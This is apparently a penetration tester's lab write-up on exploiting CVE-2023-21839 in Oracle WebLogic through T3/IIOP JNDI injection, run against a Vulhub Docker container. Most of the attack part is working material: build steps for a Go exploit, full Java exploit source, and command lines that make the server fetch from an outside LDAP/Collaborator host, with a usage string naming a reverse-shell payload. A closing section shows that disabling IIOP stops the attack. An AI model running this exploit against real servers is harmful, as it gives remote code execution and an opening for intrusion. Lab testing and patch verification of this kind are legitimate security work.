IIOP is a TCP/IP protocol stack that implements the GIOP protocol, allowing CORBA objects to communicate and interact over the Internet.
RMI-IIOP is a way of implementing the Java remote method invocation (RMI) protocol, which extends the IIOP protocol with the functionality of remote calling Java objects through RMI.
No Java dependency is required, construct the protocol and directly RCE through socket
The NAT network problem of IIOP has been solved (Docker and public network targets can be tested)
Tested in Windows/Mac OS/Linux and WebLogic 12/14
Please use JDK 8u191 or below to start WebLogic and build JNDI Server by yourself
Exploiting VulnHub 12.2.1.3-2018
» docker pull vulhub/weblogic:12.2.1.3-2018
» docker run -d -p 7001:7001 -p 9002:9002 --name weblogic-vulnhub-12213-2018 --hostname weblogic-vulnhub-12213-2018 --ulimit nofile=1024:65536 -v $PWD:/u01/oracle/properties vulhub/weblogic:12.2.1.3-2018
» docker container ls 130 ↵
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
bc98f59ca86d vulhub/weblogic:12.2.1.3-2018 "/u01/oracle/createA…" About an hour ago Up About an hour 0.0.0.0:7001->7001/tcp, :::7001->7001/tcp, 0.0.0.0:9002->9002/tcp, :::9002->9002/tcp weblogic-vulnhub-12213-2018
» docker container logs weblogic-vulnhub-12213-2018
...
<Oct 7, 2024 7:28:10,575 AM GMT> <Notice> <JMX> <BEA-149512> <JMX Connector Server started at service:jmx:iiop://172.17.0.2:7001/jndi/weblogic.management.mbeanservers.runtime.>
<Oct 7, 2024 7:28:10,722 AM GMT> <Notice> <JMX> <BEA-149512> <JMX Connector Server started at service:jmx:iiop://172.17.0.2:7001/jndi/weblogic.management.mbeanservers.domainruntime.>
<Oct 7, 2024 7:28:10,728 AM GMT> <Notice> <JMX> <BEA-149512> <JMX Connector Server started at service:jmx:iiop://172.17.0.2:7001/jndi/weblogic.management.mbeanservers.edit.>
<Oct 7, 2024 7:28:11,564 AM GMT> <Notice> <Server> <BEA-002613> <Channel "Default" is now listening on 172.17.0.2:7001 for protocols iiop, t3, ldap, snmp, http.>
<Oct 7, 2024 7:28:11,564 AM GMT> <Notice> <WebLogicServer> <BEA-000331> <Started the WebLogic Server Administration Server "AdminServer" for domain "base_domain" running in development mode.>
<Oct 7, 2024 7:28:11,564 AM GMT> <Notice> <Server> <BEA-002613> <Channel "Default[1]" is now listening on 127.0.0.1:7001 for protocols iiop, t3, ldap, snmp, http.>
<Oct 7, 2024 7:28:11,564 AM GMT> <Notice> <Server> <BEA-002613> <Channel "Default" is now listening on 172.17.0.2:7001 for protocols iiop, t3, ldap, snmp, http.>
<Oct 7, 2024 7:28:11,565 AM GMT> <Notice> <Server> <BEA-002613> <Channel "Default[1]" is now listening on 127.0.0.1:7001 for protocols iiop, t3, ldap, snmp, http.>
» nmap -Pn -n -p7001 127.0.0.1 -sC
PORT STATE SERVICE
7001/tcp open afs3-callback
|_weblogic-t3-info: T3 protocol in use (WebLogic version: 12.2.1.3)
Clone repo and build exploit:
apt :: ~ » git clone https://github.com/0xPThree/WebLogic
apt :: ~ » cd WebLogic/cve-2023-21839/cmd
apt :: WebLogic/cve-2023-21839/cmd ‹main› » go build -o CVE-2023-21839
apt :: WebLogic/cve-2023-21839/cmd ‹main*› » ls -al
total 2964
drwxrwxr-x 2 void void 4096 Oct 7 11:07 .
drwxrwxr-x 3 void void 4096 Oct 7 11:07 ..
-rwxrwxr-x 1 void void 3009295 Oct 7 11:07 CVE-2023-21839
-rw-rw-r-- 1 void void 11475 Oct 7 11:07 main.go
Run the exploit:
Response in Burp Collaborator:
Running the exploit against a patched target we get the following error:
Panic or other errors means that the target is not vulnerable. In this example it's because the IIOP function is disabled.
Java - T3
WebLogic's implementation of the RMI specification uses a proprietary protocol known as T3. You can think of T3 (and secure T3S) as a layer to expose/allow JNDI calls by clients.
T3 is the protocol used to transport information between WebLogic servers and other types of Java programs.
Exploiting from WebLogic 12.2.1.4 container
## Create base file (wlfullclient.jar)
[oracle@12214-weblogic lib]$ java -jar /u01/oracle/wlserver/modules/com.bea.core.jarbuilder.jar
Creating new jar file: wlfullclient.jar
## Upload payload to container
[oracle@12214-weblogic lib]$ curl -OL http://172.17.0.1/CVE_2023_21839.java
[oracle@12214-weblogic lib]$ curl -OL http://172.17.0.1/META-INF/MANIFEST.MF
[oracle@12214-weblogic lib]$ mkdir META-INF
[oracle@12214-weblogic lib]$ mv MANIFEST.MF META-INF/
## Create .class file
[oracle@12214-weblogic lib]$ mv wlfullclient.jar CVE_2023_21839.jar
[oracle@12214-weblogic lib]$ javac -cp CVE_2023_21839.jar CVE_2023_21839.java
[oracle@12214-weblogic lib]$ ls | grep CVE_2023_21839
CVE_2023_21839.class
CVE_2023_21839.jar
CVE_2023_21839.java
## Update base file with payload
[oracle@12214-weblogic lib]$ jar -uvf CVE_2023_21839.jar CVE_2023_21839.class
[oracle@12214-weblogic lib]$ jar -uvfm CVE_2023_21839.jar META-INF/MANIFEST.MF
## Execute exploit
[oracle@12214-weblogic lib]$ java -jar CVE_2023_21839.jar localhost:7001 ldap://zmpnx0cd2tzgorszf6mmfdt21t7kvkj9.oastify.com
## Java version
[oracle@12214-weblogic lib]$ java -version
java version "1.8.0_411"
Java(TM) SE Runtime Environment (build 1.8.0_411-b60)
Java HotSpot(TM) 64-Bit Server VM (build 25.411-b60, mixed mode)
// CVE_2023_21839.java
import java.lang.reflect.Field;
import java.util.Hashtable;
import java.util.Random;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import weblogic.deployment.jms.ForeignOpaqueReference;
public class CVE_2023_21839 {
static String JNDI_FACTORY = "weblogic.jndi.WLInitialContextFactory";
static String HOW_TO_USE = "[*] e.g. java -jar 192.168.220.129:7001 ldap://192.168.31.58:1389/Basic/ReverseShell/192.168.220.129/1111";
private static InitialContext getInitialContext(String url) throws NamingException {
Hashtable<String, String> env = new Hashtable<>();
env.put("java.naming.factory.initial", JNDI_FACTORY);
env.put("java.naming.provider.url", url);
return new InitialContext(env);
}
public static void main(String[] args) throws Exception {
if (args.length < 2) {
System.out.println(HOW_TO_USE);
System.exit(0);
}
String t3Url = args[0];
String ldapUrl = args[1];
InitialContext c = getInitialContext("t3://" + t3Url);
Hashtable<String, String> env = new Hashtable<>();
env.put("java.naming.factory.initial", "com.sun.jndi.rmi.registry.RegistryContextFactory");
ForeignOpaqueReference f = new ForeignOpaqueReference();
Field jndiEnvironment = ForeignOpaqueReference.class.getDeclaredField("jndiEnvironment");
jndiEnvironment.setAccessible(true);
jndiEnvironment.set(f, env);
Field remoteJNDIName = ForeignOpaqueReference.class.getDeclaredField("remoteJNDIName");
remoteJNDIName.setAccessible(true);
remoteJNDIName.set(f, ldapUrl);
String bindName = (new Random(System.currentTimeMillis())).nextLong() + "";
try {
c.bind(bindName, f);
c.lookup(bindName);
} catch (Exception exception) {}
}
}
Running the exploit we now get the following error:
Reading the logs we can see it is "because the incoming protocol iiop is not enabled", and we've successfully eliminated the attack vector.
» docker container logs weblogic-vulnhub-12213-2018
...
<Oct 7, 2024 8:51:07,332 AM GMT> <Warning> <Socket> <BEA-000443> <The connection attempt was rejected because the incoming protocol iiop is not enabled on channel Default[iiop].>
Last updated
Was this helpful?
Burp Collaborator callback indicating a successful exploit attempt
Burp Collaborator callback from executing the exploit
